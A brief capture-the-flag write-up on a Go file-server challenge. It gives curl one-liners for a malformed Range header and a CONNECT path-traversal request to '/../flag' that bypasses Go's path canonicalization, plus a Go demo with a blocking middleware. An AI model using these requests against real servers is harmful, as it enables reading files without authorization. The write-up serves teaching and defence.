TL;DR: https://github.com/golang/go/issues/40940

The intended solution: curl -H 'Range: bytes=--1' http://gofs.web.jctf.pro/IMG_1052.jpg

However, during the CTF one team solved it in an unintended way:

$ curl --path-as-is -X CONNECT http://gofs.web.jctf.pro/../flag

Should have found that earlier and blocked it, but oh well :).

It turned out that the CONNECT method does not perform path canonicalization, and this is actually documented in the Golang source code: https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go#L2354-L2364

Thanks to @themalwareman for pointing this out :)
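
The CONNECT behaviour described above can be reproduced offline, together with one way to block it. This is an added example, not code from the challenge or the original writeup: seenPath, passthrough and guard are hypothetical names, and the catch-all handler is an assumed stand-in for the challenge's file-serving code, which the writeup does not show.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"path"
)

// seenPath sends one request through wrap(ServeMux) and returns the status
// code plus the URL path the catch-all handler received ("" if it never ran).
func seenPath(method, target string, wrap func(http.Handler) http.Handler) (int, string) {
	got := ""
	mux := http.NewServeMux()
	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		got = r.URL.Path // the value a file-serving handler would act on
	})
	rec := httptest.NewRecorder()
	wrap(mux).ServeHTTP(rec, httptest.NewRequest(method, target, nil))
	return rec.Code, got
}

// passthrough leaves the mux unprotected.
func passthrough(h http.Handler) http.Handler { return h }

// guard fails closed: it rejects CONNECT outright and any path that is not
// already canonical, so handlers never rely on ServeMux having cleaned it.
func guard(h http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method == http.MethodConnect {
			http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
			return
		}
		if p, c := r.URL.Path, path.Clean(r.URL.Path); p != c && p != c+"/" {
			http.Error(w, "bad path", http.StatusBadRequest)
			return
		}
		h.ServeHTTP(w, r)
	})
}

func main() {
	for _, m := range []string{"GET", "CONNECT"} {
		c, p := seenPath(m, "/../flag", passthrough)
		fmt.Printf("%-7s unguarded: status=%d handler saw %q\n", m, c, p)
		c, p = seenPath(m, "/../flag", guard)
		fmt.Printf("%-7s guarded:   status=%d handler saw %q\n", m, c, p)
	}
}
```

Without the guard, GET is answered by the mux itself with a 301 to the cleaned path, while CONNECT reaches the handler with the path untouched; with the guard, neither request reaches the handler.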

Original writeup (https://twitter.com/disconnect3d_pl/status/1355969861231529985).